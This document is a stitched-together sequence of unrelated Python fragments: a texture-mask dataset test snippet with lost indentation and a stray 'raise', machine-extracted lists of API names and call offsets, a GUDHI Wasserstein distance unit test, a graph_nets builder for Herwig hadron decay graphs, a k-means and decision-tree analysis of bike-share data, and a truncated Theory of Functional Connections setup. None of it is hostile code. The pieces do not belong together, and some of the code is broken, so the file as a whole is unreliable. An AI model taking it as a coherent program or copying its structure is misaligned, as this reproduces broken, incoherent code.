imgs, textures, masks = data_set.feed(batch_size = 2)
print ('img shape: ', imgs.shape)
print ('texture shape: ', textures.shape )
print ('masks shape: ', masks.shape)
raise
img, texture_mask = data_set.get_data()
print (img.shape)
print (len(texture_mask))
img = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2RGB)
cv2.imwrite('test_img.png', img)
# cv2.imshow('img', img/ 255.0)
for i in range(3):
texture_mask[i]['texture'] = cv2.cvtColor(np.uint8(texture_mask[i]['texture']) , cv2.COLOR_BGR2RGB)
# cv2.imwrite('test_texture_%d.png'%(i), texture_mask[i]['texture']
cv2.imshow('mask_%d'%(i), texture_mask[i]['mask'])
cv2.imshow('texture_%d'%(i), texture_mask[i]['texture'])
cv2.waitKey(0)
|
[
"numpy.uint8",
"cv2.waitKey",
"cv2.imwrite",
"random.sample",
"random.shuffle",
"numpy.zeros",
"numpy.transpose",
"numpy.argmin",
"PIL.Image.open",
"random.choice",
"numpy.asarray",
"numpy.random.randint",
"numpy.array",
"numpy.arange",
"numpy.random.choice",
"cv2.imshow",
"os.path.join",
"numpy.sqrt"
] |
[((3733, 3770), 'numpy.transpose', 'np.transpose', (['imgs_data', '[0, 3, 1, 2]'], {}), '(imgs_data, [0, 3, 1, 2])\n', (3745, 3770), True, 'import numpy as np\n'), ((9622, 9654), 'cv2.imwrite', 'cv2.imwrite', (['"""test_img.png"""', 'img'], {}), "('test_img.png', img)\n", (9633, 9654), False, 'import cv2\n'), ((10027, 10041), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (10038, 10041), False, 'import cv2\n'), ((2254, 2284), 'os.path.join', 'os.path.join', (['imgs_dir', 'format'], {}), '(imgs_dir, format)\n', (2266, 2284), False, 'import os\n'), ((3930, 3971), 'numpy.transpose', 'np.transpose', (['textures_data', '[0, 3, 1, 2]'], {}), '(textures_data, [0, 3, 1, 2])\n', (3942, 3971), True, 'import numpy as np\n'), ((6138, 6181), 'numpy.zeros', 'np.zeros', (['[self.img_size, self.img_size, 3]'], {}), '([self.img_size, self.img_size, 3])\n', (6146, 6181), True, 'import numpy as np\n'), ((6208, 6262), 'random.sample', 'random.sample', (['self.folders', 'self.segmentation_regions'], {}), '(self.folders, self.segmentation_regions)\n', (6221, 6262), False, 'import random\n'), ((9584, 9597), 'numpy.uint8', 'np.uint8', (['img'], {}), '(img)\n', (9592, 9597), True, 'import numpy as np\n'), ((9907, 9957), 'cv2.imshow', 'cv2.imshow', (["('mask_%d' % i)", "texture_mask[i]['mask']"], {}), "('mask_%d' % i, texture_mask[i]['mask'])\n", (9917, 9957), False, 'import cv2\n'), ((9966, 10022), 'cv2.imshow', 'cv2.imshow', (["('texture_%d' % i)", "texture_mask[i]['texture']"], {}), "('texture_%d' % i, texture_mask[i]['texture'])\n", (9976, 10022), False, 'import cv2\n'), ((2372, 2406), 'os.path.join', 'os.path.join', (['textures_dir', 'format'], {}), '(textures_dir, format)\n', (2384, 2406), False, 'import os\n'), ((3406, 3433), 'PIL.Image.open', 'Image.open', (['imgs[img_index]'], {}), '(imgs[img_index])\n', (3416, 3433), False, 'from PIL import Image\n'), ((3652, 3671), 'numpy.array', 'np.array', (['imgs_data'], {}), '(imgs_data)\n', (3660, 3671), True, 'import numpy as np\n'), ((4490, 4519), 'os.path.join', 'os.path.join', (['data_path', '"""*/"""'], {}), "(data_path, '*/')\n", (4502, 4519), False, 'import os\n'), ((4911, 4938), 'numpy.arange', 'np.arange', (['(0)', 'self.img_size'], {}), '(0, self.img_size)\n', (4920, 4938), True, 'import numpy as np\n'), ((4940, 4967), 'numpy.arange', 'np.arange', (['(0)', 'self.img_size'], {}), '(0, self.img_size)\n', (4949, 4967), True, 'import numpy as np\n'), ((5321, 5347), 'numpy.argmin', 'np.argmin', (['dists_b'], {'axis': '(0)'}), '(dists_b, axis=0)\n', (5330, 5347), True, 'import numpy as np\n'), ((5370, 5437), 'numpy.zeros', 'np.zeros', (['(self.img_size, self.img_size, self.segmentation_regions)'], {}), '((self.img_size, self.img_size, self.segmentation_regions))\n', (5378, 5437), True, 'import numpy as np\n'), ((5756, 5805), 'numpy.random.randint', 'np.random.randint', (['(0)', '(image.shape[1] - crop_width)'], {}), '(0, image.shape[1] - crop_width)\n', (5773, 5805), True, 'import numpy as np\n'), ((5820, 5870), 'numpy.random.randint', 'np.random.randint', (['(0)', '(image.shape[0] - crop_height)'], {}), '(0, image.shape[0] - crop_height)\n', (5837, 5870), True, 'import numpy as np\n'), ((6429, 6449), 'random.choice', 'random.choice', (['files'], {}), '(files)\n', (6442, 6449), False, 'import random\n'), ((6503, 6523), 'PIL.Image.open', 'Image.open', (['file_cur'], {}), '(file_cur)\n', (6513, 6523), False, 'from PIL import Image\n'), ((8936, 8968), 'numpy.transpose', 'np.transpose', (['imgs', '[0, 3, 1, 2]'], {}), '(imgs, [0, 3, 1, 2])\n', (8948, 8968), 
True, 'import numpy as np\n'), ((8992, 9028), 'numpy.transpose', 'np.transpose', (['textures', '[0, 3, 1, 2]'], {}), '(textures, [0, 3, 1, 2])\n', (9004, 9028), True, 'import numpy as np\n'), ((9049, 9082), 'numpy.transpose', 'np.transpose', (['masks', '[0, 3, 1, 2]'], {}), '(masks, [0, 3, 1, 2])\n', (9061, 9082), True, 'import numpy as np\n'), ((9765, 9801), 'numpy.uint8', 'np.uint8', (["texture_mask[i]['texture']"], {}), "(texture_mask[i]['texture'])\n", (9773, 9801), True, 'import numpy as np\n'), ((2770, 2797), 'PIL.Image.open', 'Image.open', (['imgs[img_index]'], {}), '(imgs[img_index])\n', (2780, 2797), False, 'from PIL import Image\n'), ((3046, 3081), 'PIL.Image.open', 'Image.open', (['textures[texture_index]'], {}), '(textures[texture_index])\n', (3056, 3081), False, 'from PIL import Image\n'), ((3829, 3852), 'numpy.array', 'np.array', (['textures_data'], {}), '(textures_data)\n', (3837, 3852), True, 'import numpy as np\n'), ((5072, 5130), 'numpy.random.randint', 'np.random.randint', (['(0)', 'self.img_size'], {'size': '(n_points[i], 2)'}), '(0, self.img_size, size=(n_points[i], 2))\n', (5089, 5130), True, 'import numpy as np\n'), ((5238, 5282), 'numpy.sqrt', 'np.sqrt', (['((xs - p[0]) ** 2 + (ys - p[1]) ** 2)'], {}), '((xs - p[0]) ** 2 + (ys - p[1]) ** 2)\n', (5245, 5282), True, 'import numpy as np\n'), ((6376, 6404), 'os.path.join', 'os.path.join', (['folder', 'format'], {}), '(folder, format)\n', (6388, 6404), False, 'import os\n'), ((6858, 6878), 'random.choice', 'random.choice', (['files'], {}), '(files)\n', (6871, 6878), False, 'import random\n'), ((8391, 8423), 'random.shuffle', 'random.shuffle', (['img_texture_mask'], {}), '(img_texture_mask)\n', (8405, 8423), False, 'import random\n'), ((6920, 6940), 'PIL.Image.open', 'Image.open', (['file_cur'], {}), '(file_cur)\n', (6930, 6940), False, 'from PIL import Image\n'), ((7999, 8045), 'numpy.random.choice', 'np.random.choice', (['self.segmentation_regions', '(1)'], {}), '(self.segmentation_regions, 1)\n', (8015, 8045), True, 'import numpy as np\n'), ((8651, 8665), 'numpy.array', 'np.array', (['imgs'], {}), '(imgs)\n', (8659, 8665), True, 'import numpy as np\n'), ((8744, 8762), 'numpy.array', 'np.array', (['textures'], {}), '(textures)\n', (8752, 8762), True, 'import numpy as np\n'), ((8846, 8861), 'numpy.array', 'np.array', (['masks'], {}), '(masks)\n', (8854, 8861), True, 'import numpy as np\n'), ((6616, 6635), 'numpy.asarray', 'np.asarray', (['img_cur'], {}), '(img_cur)\n', (6626, 6635), True, 'import numpy as np\n'), ((3547, 3566), 'numpy.asarray', 'np.asarray', (['img_cur'], {}), '(img_cur)\n', (3557, 3566), True, 'import numpy as np\n'), ((2923, 2942), 'numpy.asarray', 'np.asarray', (['img_cur'], {}), '(img_cur)\n', (2933, 2942), True, 'import numpy as np\n'), ((3227, 3250), 'numpy.asarray', 'np.asarray', (['texture_cur'], {}), '(texture_cur)\n', (3237, 3250), True, 'import numpy as np\n')]
|
from gudhi.wasserstein import wasserstein_distance
import numpy as np
""" This file is part of the Gudhi Library - https://gudhi.inria.fr/ - which is released under MIT.
See file LICENSE or go to https://gudhi.inria.fr/licensing/ for full license details.
Author(s): <NAME>
Copyright (C) 2019 Inria
Modification(s):
- YYYY/MM Author: Description of the modification
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2019 Inria"
__license__ = "MIT"
def test_basic_wasserstein():
diag1 = np.array([[2.7, 3.7], [9.6, 14.0], [34.2, 34.974]])
diag2 = np.array([[2.8, 4.45], [9.5, 14.1]])
diag3 = np.array([[0, 2], [4, 6]])
diag4 = np.array([[0, 3], [4, 8]])
emptydiag = np.array([[]])
assert wasserstein_distance(emptydiag, emptydiag, q=2., p=1.) == 0.
assert wasserstein_distance(emptydiag, emptydiag, q=np.inf, p=1.) == 0.
assert wasserstein_distance(emptydiag, emptydiag, q=np.inf, p=2.) == 0.
assert wasserstein_distance(emptydiag, emptydiag, q=2., p=2.) == 0.
assert wasserstein_distance(diag3, emptydiag, q=np.inf, p=1.) == 2.
assert wasserstein_distance(diag3, emptydiag, q=1., p=1.) == 4.
    assert wasserstein_distance(diag4, emptydiag, q=1., p=2.) == 5. # thank you Pythagorean triplets
assert wasserstein_distance(diag4, emptydiag, q=np.inf, p=2.) == 2.5
assert wasserstein_distance(diag4, emptydiag, q=2., p=2.) == 3.5355339059327378
assert wasserstein_distance(diag1, diag2, q=2., p=1.) == 1.4453593023967701
assert wasserstein_distance(diag1, diag2, q=2.35, p=1.74) == 0.9772734057168739
assert wasserstein_distance(diag1, emptydiag, q=2.35, p=1.7863) == 3.141592214572228
assert wasserstein_distance(diag3, diag4, q=1., p=1.) == 3.
assert wasserstein_distance(diag3, diag4, q=np.inf, p=1.) == 3. # no diag matching here
assert wasserstein_distance(diag3, diag4, q=np.inf, p=2.) == np.sqrt(5)
assert wasserstein_distance(diag3, diag4, q=1., p=2.) == np.sqrt(5)
assert wasserstein_distance(diag3, diag4, q=4.5, p=2.) == np.sqrt(5)
|
[
"numpy.array",
"gudhi.wasserstein.wasserstein_distance",
"numpy.sqrt"
] |
[((531, 582), 'numpy.array', 'np.array', (['[[2.7, 3.7], [9.6, 14.0], [34.2, 34.974]]'], {}), '([[2.7, 3.7], [9.6, 14.0], [34.2, 34.974]])\n', (539, 582), True, 'import numpy as np\n'), ((595, 631), 'numpy.array', 'np.array', (['[[2.8, 4.45], [9.5, 14.1]]'], {}), '([[2.8, 4.45], [9.5, 14.1]])\n', (603, 631), True, 'import numpy as np\n'), ((644, 670), 'numpy.array', 'np.array', (['[[0, 2], [4, 6]]'], {}), '([[0, 2], [4, 6]])\n', (652, 670), True, 'import numpy as np\n'), ((683, 709), 'numpy.array', 'np.array', (['[[0, 3], [4, 8]]'], {}), '([[0, 3], [4, 8]])\n', (691, 709), True, 'import numpy as np\n'), ((726, 740), 'numpy.array', 'np.array', (['[[]]'], {}), '([[]])\n', (734, 740), True, 'import numpy as np\n'), ((753, 809), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': '(2.0)', 'p': '(1.0)'}), '(emptydiag, emptydiag, q=2.0, p=1.0)\n', (773, 809), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((825, 884), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': 'np.inf', 'p': '(1.0)'}), '(emptydiag, emptydiag, q=np.inf, p=1.0)\n', (845, 884), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((901, 960), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': 'np.inf', 'p': '(2.0)'}), '(emptydiag, emptydiag, q=np.inf, p=2.0)\n', (921, 960), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((977, 1033), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['emptydiag', 'emptydiag'], {'q': '(2.0)', 'p': '(2.0)'}), '(emptydiag, emptydiag, q=2.0, p=2.0)\n', (997, 1033), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1050, 1105), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'emptydiag'], {'q': 'np.inf', 'p': '(1.0)'}), '(diag3, emptydiag, q=np.inf, p=1.0)\n', (1070, 1105), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1122, 1174), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'emptydiag'], {'q': '(1.0)', 'p': '(1.0)'}), '(diag3, emptydiag, q=1.0, p=1.0)\n', (1142, 1174), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1191, 1243), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag4', 'emptydiag'], {'q': '(1.0)', 'p': '(2.0)'}), '(diag4, emptydiag, q=1.0, p=2.0)\n', (1211, 1243), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1295, 1350), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag4', 'emptydiag'], {'q': 'np.inf', 'p': '(2.0)'}), '(diag4, emptydiag, q=np.inf, p=2.0)\n', (1315, 1350), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1368, 1420), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag4', 'emptydiag'], {'q': '(2.0)', 'p': '(2.0)'}), '(diag4, emptydiag, q=2.0, p=2.0)\n', (1388, 1420), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1453, 1501), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag1', 'diag2'], {'q': '(2.0)', 'p': '(1.0)'}), '(diag1, diag2, q=2.0, p=1.0)\n', (1473, 1501), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1533, 1583), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag1', 'diag2'], {'q': '(2.35)', 'p': '(1.74)'}), '(diag1, diag2, q=2.35, p=1.74)\n', (1553, 1583), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1618, 1674), 
'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag1', 'emptydiag'], {'q': '(2.35)', 'p': '(1.7863)'}), '(diag1, emptydiag, q=2.35, p=1.7863)\n', (1638, 1674), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1708, 1756), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': '(1.0)', 'p': '(1.0)'}), '(diag3, diag4, q=1.0, p=1.0)\n', (1728, 1756), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1772, 1823), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': 'np.inf', 'p': '(1.0)'}), '(diag3, diag4, q=np.inf, p=1.0)\n', (1792, 1823), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1865, 1916), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': 'np.inf', 'p': '(2.0)'}), '(diag3, diag4, q=np.inf, p=2.0)\n', (1885, 1916), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1919, 1929), 'numpy.sqrt', 'np.sqrt', (['(5)'], {}), '(5)\n', (1926, 1929), True, 'import numpy as np\n'), ((1941, 1989), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': '(1.0)', 'p': '(2.0)'}), '(diag3, diag4, q=1.0, p=2.0)\n', (1961, 1989), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((1991, 2001), 'numpy.sqrt', 'np.sqrt', (['(5)'], {}), '(5)\n', (1998, 2001), True, 'import numpy as np\n'), ((2013, 2061), 'gudhi.wasserstein.wasserstein_distance', 'wasserstein_distance', (['diag3', 'diag4'], {'q': '(4.5)', 'p': '(2.0)'}), '(diag3, diag4, q=4.5, p=2.0)\n', (2033, 2061), False, 'from gudhi.wasserstein import wasserstein_distance\n'), ((2064, 2074), 'numpy.sqrt', 'np.sqrt', (['(5)'], {}), '(5)\n', (2071, 2074), True, 'import numpy as np\n')]
|
import numpy as np
import itertools
from graph_nets import utils_tf
from root_gnn.src.datasets.base import DataSet
n_node_features = 6
max_nodes = 3 # including the particle that decays
def num_particles(event):
return len(event) // n_node_features
def make_graph(event, debug=False):
# each particle contains: pdgID, E, px, py, pz.
scale = 0.0001
n_nodes = num_particles(event)
nodes = [[
event[inode*n_node_features+1], # E
event[inode*n_node_features+2], # px
event[inode*n_node_features+3], # py
event[inode*n_node_features+4] # pz
] for inode in range(n_nodes)]
nodes = np.array(nodes, dtype=np.float32) * scale
if debug:
print(n_nodes, "nodes")
print("node features:", nodes.shape)
if nodes.shape[0] > max_nodes:
print("cluster decays to more than {} nodes".format(max_nodes))
return [(None, None)]
elif nodes.shape[0] < max_nodes:
print("nodes: {} less than maximum {}".format(nodes.shape[0], max_nodes))
print(event)
new_nodes = np.zeros([max_nodes, 4], dtype=np.float32)
new_nodes[:nodes.shape[0], :] = nodes
nodes = new_nodes
all_edges = list(itertools.combinations(range(n_nodes), 2))
senders = np.array([x[0] for x in all_edges])
receivers = np.array([x[1] for x in all_edges])
n_edges = len(all_edges)
edges = np.expand_dims(np.array([0.0]*n_edges, dtype=np.float32), axis=1)
input_datadict = {
"n_node": 1,
"n_edge": 1,
"nodes": nodes[0, :].reshape((1, -1)),
"edges": np.expand_dims(np.array([1.0]*1, dtype=np.float32), axis=1),
"senders": np.array([0]),
"receivers": np.array([0]),
"globals": np.array([1], dtype=np.float32)
}
target_datadict = {
"n_node": n_nodes,
"n_edge": n_edges,
"nodes": nodes,
"edges": edges,
"senders": senders,
"receivers": receivers,
"globals": np.array([1]*(n_nodes-1)+[0]*(max_nodes-n_nodes+1), dtype=np.float32)
}
input_graph = utils_tf.data_dicts_to_graphs_tuple([input_datadict])
target_graph = utils_tf.data_dicts_to_graphs_tuple([target_datadict])
return [(input_graph, target_graph)]
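# Note: the input graph carries only the decaying particle (node 0, features scaled
# by 1e-4) with a single self-loop edge, while the target graph holds all decay
# products connected pairwise; its `globals` vector of length max_nodes sets the
# first (n_nodes - 1) entries to 1 and zero-pads the rest.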
def read(filename):
with open(filename, 'r') as f:
for line in f:
yield [float(x) for x in line.split()]
class HerwigHadrons(DataSet):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read = read
self.make_graph = make_graph
|
[
"numpy.zeros",
"numpy.array",
"graph_nets.utils_tf.data_dicts_to_graphs_tuple"
] |
[((1265, 1300), 'numpy.array', 'np.array', (['[x[0] for x in all_edges]'], {}), '([x[0] for x in all_edges])\n', (1273, 1300), True, 'import numpy as np\n'), ((1317, 1352), 'numpy.array', 'np.array', (['[x[1] for x in all_edges]'], {}), '([x[1] for x in all_edges])\n', (1325, 1352), True, 'import numpy as np\n'), ((2078, 2131), 'graph_nets.utils_tf.data_dicts_to_graphs_tuple', 'utils_tf.data_dicts_to_graphs_tuple', (['[input_datadict]'], {}), '([input_datadict])\n', (2113, 2131), False, 'from graph_nets import utils_tf\n'), ((2151, 2205), 'graph_nets.utils_tf.data_dicts_to_graphs_tuple', 'utils_tf.data_dicts_to_graphs_tuple', (['[target_datadict]'], {}), '([target_datadict])\n', (2186, 2205), False, 'from graph_nets import utils_tf\n'), ((639, 672), 'numpy.array', 'np.array', (['nodes'], {'dtype': 'np.float32'}), '(nodes, dtype=np.float32)\n', (647, 672), True, 'import numpy as np\n'), ((1409, 1452), 'numpy.array', 'np.array', (['([0.0] * n_edges)'], {'dtype': 'np.float32'}), '([0.0] * n_edges, dtype=np.float32)\n', (1417, 1452), True, 'import numpy as np\n'), ((1670, 1683), 'numpy.array', 'np.array', (['[0]'], {}), '([0])\n', (1678, 1683), True, 'import numpy as np\n'), ((1706, 1719), 'numpy.array', 'np.array', (['[0]'], {}), '([0])\n', (1714, 1719), True, 'import numpy as np\n'), ((1740, 1771), 'numpy.array', 'np.array', (['[1]'], {'dtype': 'np.float32'}), '([1], dtype=np.float32)\n', (1748, 1771), True, 'import numpy as np\n'), ((1983, 2069), 'numpy.array', 'np.array', (['([1] * (n_nodes - 1) + [0] * (max_nodes - n_nodes + 1))'], {'dtype': 'np.float32'}), '([1] * (n_nodes - 1) + [0] * (max_nodes - n_nodes + 1), dtype=np.\n float32)\n', (1991, 2069), True, 'import numpy as np\n'), ((1071, 1113), 'numpy.zeros', 'np.zeros', (['[max_nodes, 4]'], {'dtype': 'np.float32'}), '([max_nodes, 4], dtype=np.float32)\n', (1079, 1113), True, 'import numpy as np\n'), ((1605, 1642), 'numpy.array', 'np.array', (['([1.0] * 1)'], {'dtype': 'np.float32'}), '([1.0] * 1, dtype=np.float32)\n', (1613, 1642), True, 'import numpy as np\n')]
|
# Load the necessary libraries
import matplotlib.pyplot as plt
import numpy
import pandas
import sklearn.cluster as cluster
import sklearn.metrics as metrics
bikeshare = pandas.read_csv('C:\\Users\\minlam\\Documents\\IIT\\Machine Learning\\Data\\BikeSharingDemand_Train.csv',
delimiter=',')
# Use only these three interval variables
trainData = bikeshare[['temp', 'humidity', 'windspeed']].dropna()
nObs = trainData.shape[0]
# Determine the number of clusters using the Silhouette metrics
nClusters = numpy.zeros(15)
Elbow = numpy.zeros(15)
Silhouette = numpy.zeros(15)
for c in range(15):
KClusters = c + 1
nClusters[c] = KClusters
kmeans = cluster.KMeans(n_clusters=KClusters, random_state=60616).fit(trainData)
if (KClusters > 1):
Silhouette[c] = metrics.silhouette_score(trainData, kmeans.labels_)
WCSS = numpy.zeros(KClusters)
nC = numpy.zeros(KClusters)
for i in range(nObs):
k = kmeans.labels_[i]
nC[k] += 1
diff = trainData.iloc[i,] - kmeans.cluster_centers_[k]
WCSS[k] += diff.dot(diff)
Elbow[c] = 0
for k in range(KClusters):
Elbow[c] += WCSS[k] / nC[k]
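# Note: the "Elbow" value accumulated above is each cluster's within-cluster sum of
# squared distances divided by that cluster's size, summed over clusters, i.e. a
# total of per-cluster mean squared distances to the centroids.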
print("Cluster Size Elbow Value Silhouette Value: \n")
for c in range(15):
print(nClusters[c], Elbow[c], Silhouette[c])
plt.plot(nClusters, Elbow, linewidth = 2, marker = 'o')
plt.xticks(range(1,15,1))
plt.grid(True)
plt.xlabel("Number of Clusters")
plt.ylabel("Elbow Value")
plt.show()
# Plot the Silhouette metrics versus the number of clusters
plt.plot(nClusters, Silhouette, linewidth = 2, marker = 'o')
plt.xticks(range(1,15,1))
plt.grid(True)
plt.xlabel("Number of Clusters")
plt.ylabel("Silhouette Value")
plt.show()
KClusters = 2
kmeans = cluster.KMeans(n_clusters=KClusters, random_state=60616).fit(trainData)
nC = numpy.zeros(KClusters)
for i in range(nObs):
k = kmeans.labels_[i]
nC[k] += 1
print(nC)
for k in range(KClusters):
print("Cluster ", k)
print("Centroid = ", kmeans.cluster_centers_[k])
# Load the TREE library from SKLEARN
from sklearn import tree
classTree = tree.DecisionTreeClassifier(criterion='entropy', max_depth=4, random_state=60616)
bikeshare_DT = classTree.fit(trainData, kmeans.labels_)
print('Accuracy of Decision Tree classifier on training set: {:.6f}' .format(classTree.score(trainData, kmeans.labels_)))
import graphviz
dot_data = tree.export_graphviz(bikeshare_DT,
out_file=None,
impurity = True, filled = True,
feature_names = ['temp', 'humidity', 'windspeed'],
class_names = ['Cluster 0', 'Cluster 1'])
graph = graphviz.Source(dot_data)
graph
graph.render('C:\\Users\\minlam\\Documents\\IIT\\Machine Learning\\Job\\hmeq_output')
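# Note: the shallow decision tree fitted on the k-means labels serves as a
# cluster-profiling step; it re-expresses the two clusters as readable
# temp/humidity/windspeed splits rather than acting as an independent classifier.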
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"pandas.read_csv",
"sklearn.cluster.KMeans",
"numpy.zeros",
"sklearn.tree.DecisionTreeClassifier",
"sklearn.tree.export_graphviz",
"sklearn.metrics.silhouette_score",
"graphviz.Source",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.grid"
] |
[((178, 308), 'pandas.read_csv', 'pandas.read_csv', (['"""C:\\\\Users\\\\minlam\\\\Documents\\\\IIT\\\\Machine Learning\\\\Data\\\\BikeSharingDemand_Train.csv"""'], {'delimiter': '""","""'}), "(\n 'C:\\\\Users\\\\minlam\\\\Documents\\\\IIT\\\\Machine Learning\\\\Data\\\\BikeSharingDemand_Train.csv'\n , delimiter=',')\n", (193, 308), False, 'import pandas\n'), ((546, 561), 'numpy.zeros', 'numpy.zeros', (['(15)'], {}), '(15)\n', (557, 561), False, 'import numpy\n'), ((571, 586), 'numpy.zeros', 'numpy.zeros', (['(15)'], {}), '(15)\n', (582, 586), False, 'import numpy\n'), ((601, 616), 'numpy.zeros', 'numpy.zeros', (['(15)'], {}), '(15)\n', (612, 616), False, 'import numpy\n'), ((1337, 1388), 'matplotlib.pyplot.plot', 'plt.plot', (['nClusters', 'Elbow'], {'linewidth': '(2)', 'marker': '"""o"""'}), "(nClusters, Elbow, linewidth=2, marker='o')\n", (1345, 1388), True, 'import matplotlib.pyplot as plt\n'), ((1421, 1435), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (1429, 1435), True, 'import matplotlib.pyplot as plt\n'), ((1437, 1469), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of Clusters"""'], {}), "('Number of Clusters')\n", (1447, 1469), True, 'import matplotlib.pyplot as plt\n'), ((1471, 1496), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Elbow Value"""'], {}), "('Elbow Value')\n", (1481, 1496), True, 'import matplotlib.pyplot as plt\n'), ((1498, 1508), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1506, 1508), True, 'import matplotlib.pyplot as plt\n'), ((1573, 1629), 'matplotlib.pyplot.plot', 'plt.plot', (['nClusters', 'Silhouette'], {'linewidth': '(2)', 'marker': '"""o"""'}), "(nClusters, Silhouette, linewidth=2, marker='o')\n", (1581, 1629), True, 'import matplotlib.pyplot as plt\n'), ((1662, 1676), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (1670, 1676), True, 'import matplotlib.pyplot as plt\n'), ((1678, 1710), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of Clusters"""'], {}), "('Number of Clusters')\n", (1688, 1710), True, 'import matplotlib.pyplot as plt\n'), ((1712, 1742), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Silhouette Value"""'], {}), "('Silhouette Value')\n", (1722, 1742), True, 'import matplotlib.pyplot as plt\n'), ((1744, 1754), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1752, 1754), True, 'import matplotlib.pyplot as plt\n'), ((1862, 1884), 'numpy.zeros', 'numpy.zeros', (['KClusters'], {}), '(KClusters)\n', (1873, 1884), False, 'import numpy\n'), ((2147, 2233), 'sklearn.tree.DecisionTreeClassifier', 'tree.DecisionTreeClassifier', ([], {'criterion': '"""entropy"""', 'max_depth': '(4)', 'random_state': '(60616)'}), "(criterion='entropy', max_depth=4, random_state=\n 60616)\n", (2174, 2233), False, 'from sklearn import tree\n'), ((2442, 2618), 'sklearn.tree.export_graphviz', 'tree.export_graphviz', (['bikeshare_DT'], {'out_file': 'None', 'impurity': '(True)', 'filled': '(True)', 'feature_names': "['temp', 'humidity', 'windspeed']", 'class_names': "['Cluster 0', 'Cluster 1']"}), "(bikeshare_DT, out_file=None, impurity=True, filled=\n True, feature_names=['temp', 'humidity', 'windspeed'], class_names=[\n 'Cluster 0', 'Cluster 1'])\n", (2462, 2618), False, 'from sklearn import tree\n'), ((2760, 2785), 'graphviz.Source', 'graphviz.Source', (['dot_data'], {}), '(dot_data)\n', (2775, 2785), False, 'import graphviz\n'), ((893, 915), 'numpy.zeros', 'numpy.zeros', (['KClusters'], {}), '(KClusters)\n', (904, 915), False, 'import numpy\n'), ((925, 947), 'numpy.zeros', 'numpy.zeros', 
(['KClusters'], {}), '(KClusters)\n', (936, 947), False, 'import numpy\n'), ((828, 879), 'sklearn.metrics.silhouette_score', 'metrics.silhouette_score', (['trainData', 'kmeans.labels_'], {}), '(trainData, kmeans.labels_)\n', (852, 879), True, 'import sklearn.metrics as metrics\n'), ((1782, 1838), 'sklearn.cluster.KMeans', 'cluster.KMeans', ([], {'n_clusters': 'KClusters', 'random_state': '(60616)'}), '(n_clusters=KClusters, random_state=60616)\n', (1796, 1838), True, 'import sklearn.cluster as cluster\n'), ((706, 762), 'sklearn.cluster.KMeans', 'cluster.KMeans', ([], {'n_clusters': 'KClusters', 'random_state': '(60616)'}), '(n_clusters=KClusters, random_state=60616)\n', (720, 762), True, 'import sklearn.cluster as cluster\n')]
|
from tfc import utfc
from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot
import numpy as onp
import jax.numpy as np
from jax import vmap, jacfwd, jit, lax
import tqdm
import pickle
from scipy.optimize import fsolve
from scipy.integrate import simps
from time import process_time as timer
## TEST PARAMETERS: ***************************************************
tol = np.finfo(float).eps
maxIter = 50
W = False
if W == False:
Gam = 0.
else:
Gam = 100.
## CONSTANTS: *********************************************************
# Number of points to use
N = 100
# Number of basis functions to use
ms = 30
mc = 1
# Number of constraints
nCx = 0
nCy = 0
## GET CHEBYSHEV VALUES **********************************************
stfc = utfc(N,nCx,ms,basis='CP',x0 = -1, xf = 1.)
ctfc = utfc(N,nCy,mc,basis='CP',x0 = -1, xf = 1.)
Hs = stfc.H
Hc = ctfc.H
## DEFINE THE ASSUMED SOLUTION **************************************
z = stfc.z
z0 = z[0]
zf = z[-1]
## DEFINE CONSTRAINED EXPRESSION *************************************
